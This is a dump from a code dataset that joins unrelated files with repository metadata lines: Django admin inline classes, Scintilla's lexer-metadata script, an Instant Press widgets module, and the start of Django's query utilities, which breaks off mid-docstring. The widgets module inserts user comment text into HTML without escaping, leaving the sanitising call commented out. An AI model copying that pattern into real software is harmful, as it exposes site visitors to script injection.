self.get_formsets_with_inlines(*get_formsets_args): prefix = FormSet.get_default_prefix() prefixes[prefix] = prefixes.get(prefix, 0) + 1 if prefixes[prefix] != 1 or not prefix: prefix = "%s-%s" % (prefix, prefixes[prefix]) formset_params = { 'instance': obj, 'prefix': prefix, 'queryset': inline.get_queryset(request), } if request.method == 'POST': formset_params.update({ 'data': request.POST, 'files': request.FILES, 'save_as_new': '_saveasnew' in request.POST }) formsets.append(FormSet(**formset_params)) inline_instances.append(inline) return formsets, inline_instances class InlineModelAdmin(BaseModelAdmin): """ Options for inline editing of ``model`` instances. Provide ``fk_name`` to specify the attribute name of the ``ForeignKey`` from ``model`` to its parent. This is required if ``model`` has more than one ``ForeignKey`` to its parent. """ model = None fk_name = None formset = BaseInlineFormSet extra = 3 min_num = None max_num = None template = None verbose_name = None verbose_name_plural = None can_delete = True show_change_link = False checks_class = InlineModelAdminChecks def __init__(self, parent_model, admin_site): self.admin_site = admin_site self.parent_model = parent_model self.opts = self.model._meta self.has_registered_model = admin_site.is_registered(self.model) super(InlineModelAdmin, self).__init__() if self.verbose_name is None: self.verbose_name = self.model._meta.verbose_name if self.verbose_name_plural is None: self.verbose_name_plural = self.model._meta.verbose_name_plural @property def media(self): extra = '' if settings.DEBUG else '.min' js = ['vendor/jquery/jquery%s.js' % extra, 'jquery.init.js', 'inlines%s.js' % extra] if self.filter_vertical or self.filter_horizontal: js.extend(['SelectBox.js', 'SelectFilter2.js']) return forms.Media(js=[static('admin/js/%s' % url) for url in js]) def get_extra(self, request, obj=None, **kwargs): """Hook for customizing the number of extra inline forms.""" return self.extra def get_min_num(self, request, obj=None, **kwargs): """Hook for customizing the min number of inline forms.""" return self.min_num def get_max_num(self, request, obj=None, **kwargs): """Hook for customizing the max number of extra inline forms.""" return self.max_num def get_formset(self, request, obj=None, **kwargs): """Returns a BaseInlineFormSet class for use in admin add/change views.""" if 'fields' in kwargs: fields = kwargs.pop('fields') else: fields = flatten_fieldsets(self.get_fieldsets(request, obj)) if self.exclude is None: exclude = [] else: exclude = list(self.exclude) exclude.extend(self.get_readonly_fields(request, obj)) if self.exclude is None and hasattr(self.form, '_meta') and self.form._meta.exclude: # Take the custom ModelForm's Meta.exclude into account only if the # InlineModelAdmin doesn't define its own. exclude.extend(self.form._meta.exclude) # If exclude is an empty list we use None, since that's the actual # default. exclude = exclude or None can_delete = self.can_delete and self.has_delete_permission(request, obj) defaults = { "form": self.form, "formset": self.formset, "fk_name": self.fk_name, "fields": fields, "exclude": exclude, "formfield_callback": partial(self.formfield_for_dbfield, request=request), "extra": self.get_extra(request, obj, **kwargs), "min_num": self.get_min_num(request, obj, **kwargs), "max_num": self.get_max_num(request, obj, **kwargs), "can_delete": can_delete, } defaults.update(kwargs) base_model_form = defaults['form'] class DeleteProtectedModelForm(base_model_form): def hand_clean_DELETE(self): """ We don't validate the 'DELETE' field itself because on templates it's not rendered using the field information, but just using a generic "deletion_field" of the InlineModelAdmin. """ if self.cleaned_data.get(DELETION_FIELD_NAME, False): using = router.db_for_write(self._meta.model) collector = NestedObjects(using=using) if self.instance.pk is None: return collector.collect([self.instance]) if collector.protected: objs = [] for p in collector.protected: objs.append( # Translators: Model verbose name and instance representation, # suitable to be an item in a list. _('%(class_name)s %(instance)s') % { 'class_name': p._meta.verbose_name, 'instance': p} ) params = {'class_name': self._meta.model._meta.verbose_name, 'instance': self.instance, 'related_objects': get_text_list(objs, _('and'))} msg = _("Deleting %(class_name)s %(instance)s would require " "deleting the following protected related objects: " "%(related_objects)s") raise ValidationError(msg, code='deleting_protected', params=params) def is_valid(self): result = super(DeleteProtectedModelForm, self).is_valid() self.hand_clean_DELETE() return result defaults['form'] = DeleteProtectedModelForm if defaults['fields'] is None and not modelform_defines_fields(defaults['form']): defaults['fields'] = forms.ALL_FIELDS return inlineformset_factory(self.parent_model, self.model, **defaults) def get_fields(self, request, obj=None): if self.fields: return self.fields form = self.get_formset(request, obj, fields=None).form return list(form.base_fields) + list(self.get_readonly_fields(request, obj)) def get_queryset(self, request): queryset = super(InlineModelAdmin, self).get_queryset(request) if not self.has_change_permission(request): queryset = queryset.none() return queryset def has_add_permission(self, request): if self.opts.auto_created: # We're checking the rights to an auto-created intermediate model, # which doesn't have its own individual permissions. The user needs # to have the change permission for the related model in order to # be able to do anything with the intermediate model. return self.has_change_permission(request) return super(InlineModelAdmin, self).has_add_permission(request) def has_change_permission(self, request, obj=None): opts = self.opts if opts.auto_created: # The model was auto-created as intermediary for a # ManyToMany-relationship, find the target model for field in opts.fields: if field.remote_field and field.remote_field.model != self.parent_model: opts = field.remote_field.model._meta break codename = get_permission_codename('change', opts) return request.user.has_perm("%s.%s" % (opts.app_label, codename)) def has_delete_permission(self, request, obj=None): if self.opts.auto_created: # We're checking the rights to an auto-created intermediate model, # which doesn't have its own individual permissions. The user needs # to have the change permission for the related model in order to # be able to do anything with the intermediate model. return self.has_change_permission(request, obj) return super(InlineModelAdmin, self).has_delete_permission(request, obj) class StackedInline(InlineModelAdmin): template = 'admin/edit_inline/stacked.html' class TabularInline(InlineModelAdmin): template = 'admin/edit_inline/tabular.html'
bsd-3-clause
ppriest/mame
3rdparty/bgfx/3rdparty/scintilla/scripts/ScintillaData.py
69
8599
# ScintillaData.py - implemented 2013 by Neil Hodgson [email protected] # Released to the public domain. # Common code used by Scintilla and SciTE for source file regeneration. # The ScintillaData object exposes information about Scintilla as properties: # Version properties # version # versionDotted # versionCommad # # Date last modified # dateModified # yearModified # mdyModified # dmyModified # myModified # # Information about lexers and properties defined in lexers # lexFiles # sorted list of lexer files # lexerModules # sorted list of module names # lexerProperties # sorted list of lexer properties # propertyDocuments # dictionary of property documentation { name: document string } # This file can be run to see the data it provides. # Requires Python 2.5 or later from __future__ import with_statement import codecs, datetime, glob, os, sys, textwrap import FileGenerator def FindModules(lexFile): modules = [] with open(lexFile) as f: for l in f.readlines(): if l.startswith("LexerModule"): l = l.replace("(", " ") modules.append(l.split()[1]) return modules # Properties that start with lexer. or fold. are automatically found but there are some # older properties that don't follow this pattern so must be explicitly listed. knownIrregularProperties = [ "fold", "styling.within.preprocessor", "tab.timmy.whinge.level", "asp.default.language", "html.tags.case.sensitive", "ps.level", "ps.tokenize", "sql.backslash.escapes", "nsis.uservars", "nsis.ignorecase" ] def FindProperties(lexFile): properties = {} with open(lexFile) as f: for l in f.readlines(): if ("GetProperty" in l or "DefineProperty" in l) and "\"" in l: l = l.strip() if not l.startswith("//"): # Drop comments propertyName = l.split("\"")[1] if propertyName.lower() == propertyName: # Only allow lower case property names if propertyName in knownIrregularProperties or \ propertyName.startswith("fold.") or \ propertyName.startswith("lexer."): properties[propertyName] = 1 return properties def FindPropertyDocumentation(lexFile): documents = {} with open(lexFile) as f: name = "" for l in f.readlines(): l = l.strip() if "// property " in l: propertyName = l.split()[2] if propertyName.lower() == propertyName: # Only allow lower case property names name = propertyName documents[name] = "" elif "DefineProperty" in l and "\"" in l: propertyName = l.split("\"")[1] if propertyName.lower() == propertyName: # Only allow lower case property names name = propertyName documents[name] = "" elif name: if l.startswith("//"): if documents[name]: documents[name] += " " documents[name] += l[2:].strip() elif l.startswith("\""): l = l[1:].strip() if l.endswith(";"): l = l[:-1].strip() if l.endswith(")"): l = l[:-1].strip() if l.endswith("\""): l = l[:-1] # Fix escaped double quotes l = l.replace("\\\"", "\"") documents[name] += l else: name = "" for name in list(documents.keys()): if documents[name] == "": del documents[name] return documents def FindCredits(historyFile): credits = [] stage = 0 with codecs.open(historyFile, "r", "utf-8") as f: for l in f.readlines(): l = l.strip() if stage == 0 and l == "<table>": stage = 1 elif stage == 1 and l == "</table>": stage = 2 if stage == 1 and l.startswith("<td>"): credit = l[4:-5] if "<a" in l: title, a, rest = credit.partition("<a href=") urlplus, bracket, end = rest.partition(">") name = end.split("<")[0] url = urlplus[1:-1] credit = title.strip() if credit: credit += " " credit += name + " " + url credits.append(credit) return credits def ciCompare(a,b): return cmp(a.lower(), b.lower()) def ciKey(a): return a.lower() def SortListInsensitive(l): try: # Try key function l.sort(key=ciKey) except TypeError: # Earlier version of Python, so use comparison function l.sort(ciCompare) class ScintillaData: def __init__(self, scintillaRoot): # Discover verion information with open(scintillaRoot + "version.txt") as f: self.version = f.read().strip() self.versionDotted = self.version[0] + '.' + self.version[1] + '.' + \ self.version[2] self.versionCommad = self.version[0] + ', ' + self.version[1] + ', ' + \ self.version[2] + ', 0' with open(scintillaRoot + "doc/index.html") as f: self.dateModified = [l for l in f.readlines() if "Date.Modified" in l]\ [0].split('\"')[3] # 20130602 # index.html, SciTE.html dtModified = datetime.datetime.strptime(self.dateModified, "%Y%m%d") self.yearModified = self.dateModified[0:4] monthModified = dtModified.strftime("%B") dayModified = "%d" % dtModified.day self.mdyModified = monthModified + " " + dayModified + " " + self.yearModified # May 22 2013 # index.html, SciTE.html self.dmyModified = dayModified + " " + monthModified + " " + self.yearModified # 22 May 2013 # ScintillaHistory.html -- only first should change self.myModified = monthModified + " " + self.yearModified # Find all the lexer source code files lexFilePaths = glob.glob(scintillaRoot + "lexers/Lex*.cxx") SortListInsensitive(lexFilePaths) self.lexFiles = [os.path.basename(f)[:-4] for f in lexFilePaths] self.lexerModules = [] lexerProperties = set() self.propertyDocuments = {} for lexFile in lexFilePaths: self.lexerModules.extend(FindModules(lexFile)) for k in FindProperties(lexFile).keys(): lexerProperties.add(k) documents = FindPropertyDocumentation(lexFile) for k in documents.keys(): if k not in self.propertyDocuments: self.propertyDocuments[k] = documents[k] SortListInsensitive(self.lexerModules) self.lexerProperties = list(lexerProperties) SortListInsensitive(self.lexerProperties) self.credits = FindCredits(scintillaRoot + "doc/ScintillaHistory.html") def printWrapped(text): print(textwrap.fill(text, subsequent_indent=" ")) if __name__=="__main__": sci = ScintillaData("../") print("Version %s %s %s" % (sci.version, sci.versionDotted, sci.versionCommad)) print("Date last modified %s %s %s %s %s" % ( sci.dateModified, sci.yearModified, sci.mdyModified, sci.dmyModified, sci.myModified)) printWrapped(str(len(sci.lexFiles)) + " lexer files: " + ", ".join(sci.lexFiles)) printWrapped(str(len(sci.lexerModules)) + " lexer modules: " + ", ".join(sci.lexerModules)) printWrapped("Lexer properties: " + ", ".join(sci.lexerProperties)) print("Lexer property documentation:") documentProperties = list(sci.propertyDocuments.keys()) SortListInsensitive(documentProperties) for k in documentProperties: print(" " + k) print(textwrap.fill(sci.propertyDocuments[k], initial_indent=" ", subsequent_indent=" ")) print("Credits:") for c in sci.credits: if sys.version_info[0] == 2: print(" " + c.encode("utf-8")) else: sys.stdout.buffer.write(b" " + c.encode("utf-8") + b"\n")
gpl-2.0
ijoewahjoedi/instant-press
modules/widgets.py
6
28658
# -*- coding: utf-8 -*- # # Instant Press. Instant sites. CMS developed in Web2py Framework # Site: http://www.instant2press.com # # Copyright (c) 2010 Mulone, Pablo Martín # # License Code: GPL, General Public License v. 2.0 # License Content: Creative Commons Attribution 3.0 # # Also visit: www.web2py.com # or Groups: http://groups.google.com/group/web2py # http://groups.google.com/group/web2py-usuarios # # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 2 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/> from gluon.html import * from gluon.http import * from gluon.validators import * from gluon.sqlhtml import * import gluon.contrib.simplejson as sj #local from utils import * class Widgets(object): def __init__(self, i2p): self.i2p = i2p def get_menu(self): db = self.i2p.db T = self.i2p.environment.T request = self.i2p.environment.request config = self.i2p.config articles = self.i2p.articles #this list the top pages #the maximun display lenght of title is 25 characters xml_pages="" trunk_title = 25 (pages, pages_count) = articles.get_last_pages(1) for page in pages: (url, notvalid) = (IS_URL()(page.post_url)) if notvalid: #this is a normal post link_page = articles.get_page_permanent_link(page.id, \ page.title[:trunk_title]) else: #this is a url-post link_page = A(page.title[:trunk_title], _href=page.post_url) xml_page = '<li>%s</li>' % link_page.xml() #xml_pages += sanitate_string(xml_page) xml_pages += xml_page link_home = A(T('Home'), _href=URL(request.application,\ config.controller_default,\ 'index')) xml_menu='<ul><li>%s</li> %s </ul>' % (link_home,xml_pages) return xml_menu def front(self): config = self.i2p.config siteinfo = self.i2p.siteinfo if config.front_enabled: welcome_description = '<div class="entry">%s</div>' \ % siteinfo._get_frontpage() xml = '<div class="post"> %s </div>' % welcome_description else: xml="" return xml def sidebar_aboutme(self): db = self.i2p.db T = self.i2p.environment.T request = self.i2p.environment.request config = self.i2p.config siteinfo = self.i2p.siteinfo about_xml = "" if config.about_enabled: about_caption = T('About') about_info = siteinfo._get_aboutme() if about_info != "": about_description = '%s' % about_info about_xml = '<div id="sidebar-about"><h2>%s</h2> %s </div>' \ % (about_caption, about_description) return about_xml def sidebar_archive(self): config = self.i2p.config articles = self.i2p.articles archive_xml = "" if config.archive_enabled: archive_generate="" if not config.widgets_ajax: archive_generate = articles.get_list_archives() archive_xml = '<div id="sidebar-archive"> %s </div>' % archive_generate return archive_xml def footer_archive(self): config = self.i2p.config articles = self.i2p.articles archive_xml = "" if config.archive_enabled: archive_generate="" if not config.widgets_ajax: archive_generate = articles.get_list_archives() archive_xml = '<div id="footer-widgets-archives" class="footer-columns"> %s </div>' \ % archive_generate return archive_xml def get_pages(self): T = self.i2p.environment.T pages_caption = T('Pages') pages_generate = self.get_menu() xml_pages = '<h2>%s</h2> %s' % (pages_caption,pages_generate) return xml_pages def sidebar_pages(self): config = self.i2p.config pages_xml = "" if config.pages_enabled: pages_generate="" if not config.widgets_ajax: pages_generate = self.get_pages() pages_xml = '<div id="sidebar-pages"> %s </div>' % (pages_generate) return pages_xml def footer_pages(self): config = self.i2p.config pages_xml = "" if config.pages_enabled: pages_generate="" if not config.widgets_ajax: pages_generate = self.get_pages() pages_xml = '<div id="footer-widgets-pages" class="footer-columns"> %s </div>' \ % (pages_generate) return pages_xml def sidebar_links(self): config = self.i2p.config articles = self.i2p.articles links_xml = "" if config.pages_enabled: links_generate="" if not config.widgets_ajax: links_generate = articles.get_list_links() links_xml = '<div id="sidebar-links"> %s </div>' % (links_generate) return links_xml def load_last_comments(self, page=1): db = self.i2p.db T = self.i2p.environment.T request = self.i2p.environment.request xml_comments="" last_comments="" header = T('Last comments') (limit_inf, limit_sup) = get_query_limits(page, 5) #the last five comments query = (db.comments.id>0) last_comments = db(query).select(db.comments.ALL,\ orderby=~db.comments.comment_on,\ limitby=(limit_inf, limit_sup)) for comment in last_comments: #author_avatar = IMG(_src=URL(r=request,c='static',f='images/avatar.png'), alt="avatar", style="padding: 5px; float:left;") author_sytle = ""#"padding: 5px; float:left;" author_avatar = self.i2p.comments._get_avatar(comment.author_id,\ style=author_sytle) text_comment = comment.comment[:60] comment_user = self.i2p.users.get_user_title(comment.author_id) comment_time = comment.comment_on.strftime("%B %d, %Y:%I:%M %p") link_post = self.i2p.articles.get_post_permanent_link(comment.post_id) xml_comment = '<li><div style="float:left">%s</div> %s say: %s on %s on article %s</li>' \ % (author_avatar.xml(), comment_user, text_comment, \ comment_time, link_post.xml()) #xml_comments += sanitate_string(xml_comment) xml_comments += xml_comment if xml_comments!="": last_comments="<h2>%s</h2><ul>%s</ul>" % (header,xml_comments) return last_comments def sidebar_last_comments(self): comments_xml = "" config = self.i2p.config if config.comments_method in ['Disqus']: comments_xml = '<div id="sidebar-last-comments"> %s </div>' % self._disqus_last_comments() elif config.comments_method in ['Enabled']: comments_generate="" if not config.widgets_ajax: comments_generate = self.load_last_comments() comments_xml = '<div id="sidebar-last-comments"> %s </div>' % (comments_generate) return comments_xml def sidebar_tags(self): config = self.i2p.config articles = self.i2p.articles tags_xml = "" if config.tags_enabled: tags_generate="" if not config.widgets_ajax: tags_generate = articles.get_popular_tags() tags_xml = '<div id="sidebar-tags">%s</div><div style="clear: both; float: none;"></div>' \ % tags_generate return tags_xml def sidebar_feed(self): T = self.i2p.environment.T request = self.i2p.environment.request config = self.i2p.config feed_xml = "" if config.feed_enabled: feed_caption = T('Rss') icon_feed_url = URL(request.application,'static','images/feed.png') img_feed = IMG(_src=icon_feed_url, _alt="Feed", _style="padding-left: 5px;") link_feedposts = A(T("Rss last posts"), \ _href=URL(request.application,\ config.controller_default,\ 'feed_articles.rss' )) link_feedcomments = A(T("Rss last comments"), \ _href=URL(request.application,\ config.controller_default,\ 'feed_comments.rss' )) feed_posts = '<li>%s %s</li>' % (link_feedposts, img_feed.xml()) feed_comments = '<li>%s %s</li>' % (link_feedcomments, img_feed.xml()) feed_xml = '<div id="sidebar-feed"><h2>%s</h2> <ul> %s %s </ul> </div>' \ % (feed_caption, feed_posts, feed_comments) return feed_xml def load_last_posts(self): articles = self.i2p.articles T = self.i2p.environment.T request = self.i2p.environment.request xml_posts="" last_posts="" last_entries = T('Last entries') (posts, post_count) = articles.get_last_posts(1) for post in posts: link_post = articles.get_post_permanent_link(post.id, \ post.title) xml_post = '<li>%s</li>' % link_post.xml() xml_posts += xml_post if xml_posts!="": last_posts="<h2>%s</h2><ul>%s</ul>" % (last_entries,xml_posts) return last_posts def sidebar_last_posts(self): config = self.i2p.config last_posts='' if config.last_post_enabled: xml_posts="" if not config.widgets_ajax: xml_posts = self.load_last_posts() last_posts='<div id="sidebar-last-posts">%s</div>' % xml_posts return last_posts def footer_last_posts(self): config = self.i2p.config last_posts='' if config.last_post_enabled: xml_posts="" if not config.widgets_ajax: xml_posts = self.load_last_posts() last_posts='<div id="footer-widgets-last-posts" class="footer-columns">%s</div>' \ % xml_posts return last_posts def load_categories(self): config = self.i2p.config db = self.i2p.db T = self.i2p.environment.T request = self.i2p.environment.request xml_cats="" categories="" cats = self.i2p.categories.get_list(page=1, limit=30) for cat in cats: post_count = db(db.posts.categories.contains(str(cat.id))).count() #contains bug in web2py text_cat = " %s (%s)" % (cat.title,post_count) link_cat = A(text_cat,_title="%s"%cat.description,\ _href=URL(request.application,\ config.controller_default,\ 'category/by_id', args=[unicode(cat.id)] )) xml_cat = '<li>%s</li>' % link_cat.xml() xml_cats += xml_cat if xml_cats!="": categories = "<h2>%s</h2>"%T('Categories') categories += "<ul>%s</ul>"%xml_cats return categories def sidebar_categories(self): config = self.i2p.config xml_categories = "" if config.categories_enabled: xml_cats="" if not config.widgets_ajax: xml_cats = self.load_categories() xml_categories='<div id="sidebar-categories">%s</div>' % xml_cats return xml_categories def footer_categories(self): config = self.i2p.config xml_categories = "" if config.categories_enabled: xml_cats="" if not config.widgets_ajax: xml_cats = self.load_categories() xml_categories='<div id="footer-widgets-categories" class="footer-columns">%s</div>' \ % xml_cats return xml_categories def sidebar_search(self): config = self.i2p.config T = self.i2p.environment.T request = self.i2p.environment.request xml_content = "" if config.search_enabled: title_search = T('Search') search_url = URL(request.application, \ config.controller_default,\ 'search') xml_content = '''<div id="sidebar-search" > <h2>%s</h2> <form method="get" action="%s"> <div><input type="text" name="q" id="sidebar-search-text" value="" /></div> <div><input type="submit" id="sidebar-search-submit" value="Search" /></div> </form> </div> ''' % (title_search,search_url) return xml_content def add_this(self, url="",title="",description=""): config = self.i2p.config #need fix: need to escape to somethin like: &amp; if title!='': addthis_title = 'addthis:title="%s"' % clean_html(title) else: addthis_title = '' if url!='': addthis_url = 'addthis:url="%s"' % url else: addthis_url = '' if description!='': addthis_description = 'addthis:description="%s"' % clean_html(description) else: addthis_description = '' addthis = '''<!-- AddThis Button BEGIN --> <div class="addthis_toolbox addthis_default_style"> <a href="http://www.addthis.com/bookmark.php?v=250&amp;username=%(username)s" class="addthis_button_compact" %(url)s %(title)s %(description)s >Share</a> <span class="addthis_separator">|</span> <a class="addthis_button_facebook" %(url)s %(title)s %(description)s></a> <a class="addthis_button_myspace" %(url)s %(title)s %(description)s></a> <a class="addthis_button_google" %(url)s %(title)s %(description)s></a> <a class="addthis_button_twitter" %(url)s %(title)s %(description)s></a> </div> <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=%(username)s"></script> <!-- AddThis Button END --> ''' % {'username': config.addthis_user, 'url': addthis_url, 'title': addthis_title, 'description': addthis_description} return addthis def post_meta(self, post): T = self.i2p.environment.T request = self.i2p.environment.request config = self.i2p.config articles = self.i2p.articles users = self.i2p.users post_author_caption = '<span class="author">%s</span>' \ % users.get_user_title(post.created_by_id) post_category = articles.get_post_category(post.id) if post_category=="": post_category = T("uncategorized") in_category = T('in') else: in_category = T('in categories') #post_time = post.published_on.strftime("%B %d, %Y at %I:%M") post_time = post.published_on.strftime("%Y-%m-%d %I:%M") year_full = post.published_on.strftime("%Y") month = post.published_on.strftime("%m") link_time = A(post_time, _href=URL(request.application,\ config.controller_default,\ 'archives',args=[year_full,month])) posted_by = T('By') updated_on = T('Published on') byline = '%s %s %s %s %s %s' % (updated_on, link_time.xml(), posted_by, \ post_author_caption, in_category, post_category) return byline def post_extract(self, post): config = self.i2p.config T = self.i2p.environment.T request = self.i2p.environment.request comments = self.i2p.comments articles = self.i2p.articles label_comments = "%s" % T('Comments') if config.comments_method in ['Enabled'] and not config.widgets_ajax: comments_count = comments._get_comment_count(post.id) elif config.comments_method in ['Disqus']: comments_count = "" else: comments_count = 0 if config.comments_method in ['Disqus']: link_comments = articles.get_post_permanent_link(post.id, \ 'Comments', \ 'disqus_thread') else: link_comments = articles.get_post_permanent_link(post.id, \ label_comments, \ 'comments') link_readmore = articles.get_post_permanent_link(post.id, T("Read more")) base_http = 'http://' + str(request.env.http_host) url_permanent = articles.get_post_permanent_link(post.id, only_url=True ) url_post = str(base_http + url_permanent) if config.addthis_enabled: #add_this = self.add_this(url_post,post.title,post.text_slice[:100]) #need to pass: title, url, description add_this = self.add_this(url_permanent,post.title,post.text_slice[:100]) #need to pass: title, url, description else: add_this = "" xml_post = '<div class="post">' xml_post +='<h2 class="title">%s</h2>' \ % articles.get_post_permanent_link(post.id).xml() xml_post +='''<div class="meta">%s - <span class="comments-count" id="comments-count_%s"> %s </span> %s </div>''' \ % (self.post_meta(post), post.id, comments_count, link_comments.xml()) if config.editor_language in ['Markmin']: text_slice = MARKMIN(post.text_slice) else: text_slice = post.text_slice xml_post +='<div class="entry">%s</div>' % text_slice xml_post +='''<div class="links"> <div class="readmore"> %s </div> <div class="addthis"> %s </div> <div style="float:none; clear:both;"></div> </div>''' % (link_readmore.xml(), add_this) xml_post +='</div>' return xml_post def last_posts(self, page): articles = self.i2p.articles (posts, count_posts) = articles.get_last_posts(page) xml_posts = articles.get_xml_results_from_posts(posts) xml_posts += articles.pagination_last_post(page, count_posts) return xml_posts def disqus_comments(self): config = self.i2p.config if config.disqus_dev: developer = 'var disqus_developer = 1;'; else: developer = ''; script = ''' <div id="disqus_thread"></div> <script type="text/javascript"> %(developer)s /** * var disqus_identifier; [Optional but recommended: Define a unique identifier (e.g. post id or slug) for this thread] */ (function() { var dsq = document.createElement('script'); dsq.type = 'text/javascript'; dsq.async = true; dsq.src = 'http://%(site)s.disqus.com/embed.js'; (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq); })(); </script> <noscript>Please enable JavaScript to view the <a href="http://disqus.com/?ref_noscript=%(site)s">comments powered by Disqus.</a></noscript> <a href="http://disqus.com" class="dsq-brlink">blog comments powered by <span class="logo-disqus">Disqus</span></a> ''' % {'developer': developer, 'site': config.disqus_site} return script def disqus_comments_count(self): config = self.i2p.config script = ''' <script type="text/javascript"> var disqus_shortname = '%(site)s'; (function () { var s = document.createElement('script'); s.async = true; s.src = 'http://disqus.com/forums/%(site)s/count.js'; (document.getElementsByTagName('HEAD')[0] || document.getElementsByTagName('BODY')[0]).appendChild(s); }()); </script> ''' % {'site': config.disqus_site} return script def _disqus_last_comments(self): T = self.i2p.environment.T config = self.i2p.config if self.i2p.config.avatars_enabled: hide_avatars = 0 else: hide_avatars = 1 avatar_size = self.i2p.config.avatar_size recent_comments=T("Recent Comments") num_items = 5 script = ''' <div id="recentcomments" class="dsq-widget"> <h2 class="dsq-widget-title">%(recent_comments)s</h2> <script type="text/javascript" src="http://disqus.com/forums/%(site)s/recent_comments_widget.js?num_items=%(num_items)s&hide_avatars=%(hide_avatars)s&avatar_size=%(avatar_size)s&excerpt_length=200"> </script> </div> <a href="http://disqus.com/">Powered by Disqus</a> ''' % {'site': config.disqus_site, 'recent_comments': recent_comments, 'avatar_size': avatar_size, 'hide_avatars': hide_avatars, 'num_items': num_items} return script def sidebar_popular_threads(self): config = self.i2p.config popular_threads='' #for now only in disqus if config.comments_method in ['Disqus']: popular_threads='<div id="sidebar-popular-threads">%s</div>' % self._disqus_popular_threads() return popular_threads def _disqus_popular_threads(self): config = self.i2p.config T = self.i2p.environment.T popular_threads=T("Popular Threads") script = ''' <div id="popularthreads" class="dsq-widget"> <h2 class="dsq-widget-title">%(popular_threads)s</h2> <script type="text/javascript" src="http://disqus.com/forums/%(site)s/popular_threads_widget.js?num_items=5"> </script> </div> <a href="http://disqus.com/">Powered by Disqus</a> '''% {'site': config.disqus_site,'popular_threads':popular_threads} return script def sidebar_top_commenters(self): config = self.i2p.config top_commenters='' #for now only in disqus if config.comments_method in ['Disqus']: top_commenters='<div id="sidebar-top-commenters">%s</div>' % self._disqus_top_commenters() return top_commenters def _disqus_top_commenters(self): T = self.i2p.environment.T config = self.i2p.config avatar_size = self.i2p.config.avatar_size if self.i2p.config.avatars_enabled: hide_avatars = 0 else: hide_avatars = 1 num_items = 5 top_commenters=T('Top Commenters') script = ''' <div id="topcommenters" class="dsq-widget"> <h2 class="dsq-widget-title">%(top_commenters)s</h2> <script type="text/javascript" src="http://disqus.com/forums/%(site)s/top_commenters_widget.js?num_items=%(num_items)s&hide_mods=0&hide_avatars=%(hide_avatars)s&avatar_size=%(avatar_size)s"> </script> </div> <a href="http://disqus.com/">Powered by Disqus</a> '''% {'site': config.disqus_site, 'top_commenters':top_commenters, 'avatar_size':avatar_size, 'hide_avatars':hide_avatars, 'num_items':num_items} return script def sidebar_combination(self): config = self.i2p.config T = self.i2p.environment.T head_combination = T('Posts') combination='' #for now only in disqus if config.comments_method in ['Disqus']: combination='<div id="sidebar-combination"><h2>%s</h2>%s</div>' % (head_combination, self._disqus_combination()) return combination def _disqus_combination(self): config = self.i2p.config num_items = 5 script = ''' <script type="text/javascript" src="http://disqus.com/forums/%(site)s/combination_widget.js?num_items=%(num_items)s&hide_mods=0&color=grey&default_tab=recent&excerpt_length=200"> </script> <a href="http://disqus.com/">Powered by Disqus</a> '''% {'site': config.disqus_site, 'num_items':num_items} return script def ga_script(self): config = self.i2p.config script="" if config.ga_enabled: script = ''' <script> var _gaq = [['_setAccount', '%(ga_id)s'], ['_trackPageview']]; (function(d, t) { var g = d.createElement(t), s = d.getElementsByTagName(t)[0]; g.async = true; g.src = '//www.google-analytics.com/ga.js'; s.parentNode.insertBefore(g, s); })(document, 'script'); </script> ''' % {'ga_id': config.ga_id} return script
gpl-2.0
umitproject/tease-o-matic
django/db/models/query_utils.py
240
5799
""" Various data structures used in query construction. Factored out from django.db.models.query to avoid making the main module very large and/or so that they can be used by other modules without getting into circular import difficulties. """ import weakref from django.utils.copycompat import deepcopy from django.db.backends import util from django.utils import tree from django.utils.datastructures import SortedDict class InvalidQuery(Exception): """ The query passed to raw isn't a safe query to use with raw. """ pass class QueryWrapper(object): """ A type that indicates the contents are an SQL fragment and the associate parameters. Can be used to pass opaque data to a where-clause, for example. """ def __init__(self, sql, params): self.data = sql, params def as_sql(self, qn=None, connection=None): return self.data class Q(tree.Node): """ Encapsulates filters as objects that can then be combined logically (using & and |). """ # Connection types AND = 'AND' OR = 'OR' default = AND def __init__(self, *args, **kwargs): super(Q, self).__init__(children=list(args) + kwargs.items()) def _combine(self, other, conn): if not isinstance(other, Q): raise TypeError(other) obj = type(self)() obj.add(self, conn) obj.add(other, conn) return obj def __or__(self, other): return self._combine(other, self.OR) def __and__(self, other): return self._combine(other, self.AND) def __invert__(self): obj = type(self)() obj.add(self, self.AND) obj.negate() return obj class DeferredAttribute(object): """ A wrapper for a deferred-loading field. When the value is read from this object the first time, the query is executed. """ def __init__(self, field_name, model): self.field_name = field_name self.model_ref = weakref.ref(model) self.loaded = False def __get__(self, instance, owner): """ Retrieves and caches the value from the datastore on the first lookup. Returns the cached value. """ from django.db.models.fields import FieldDoesNotExist assert instance is not None cls = self.model_ref() data = instance.__dict__ if data.get(self.field_name, self) is self: # self.field_name is the attname of the field, but only() takes the # actual name, so we need to translate it here. try: cls._meta.get_field_by_name(self.field_name) name = self.field_name except FieldDoesNotExist: name = [f.name for f in cls._meta.fields if f.attname == self.field_name][0] # We use only() instead of values() here because we want the # various data coersion methods (to_python(), etc.) to be called # here. val = getattr( cls._base_manager.filter(pk=instance.pk).only(name).using( instance._state.db).get(), self.field_name ) data[self.field_name] = val return data[self.field_name] def __set__(self, instance, value): """ Deferred loading attributes can be set normally (which means there will never be a database lookup involved. """ instance.__dict__[self.field_name] = value def select_related_descend(field, restricted, requested, reverse=False): """ Returns True if this field should be used to descend deeper for select_related() purposes. Used by both the query construction code (sql.query.fill_related_selections()) and the model instance creation code (query.get_cached_row()). Arguments: * field - the field to be checked * restricted - a boolean field, indicating if the field list has been manually restricted using a requested clause) * requested - The select_related() dictionary. * reverse - boolean, True if we are checking a reverse select related """ if not field.rel: return False if field.rel.parent_link and not reverse: return False if restricted: if reverse and field.related_query_name() not in requested: return False if not reverse and field.name not in requested: return False if not restricted and field.null: return False return True # This function is needed because data descriptors must be defined on a class # object, not an instance, to have any effect. def deferred_class_factory(model, attrs): """ Returns a class object that is a copy of "model" with the specified "attrs" being replaced with DeferredAttribute objects. The "pk_value" ties the 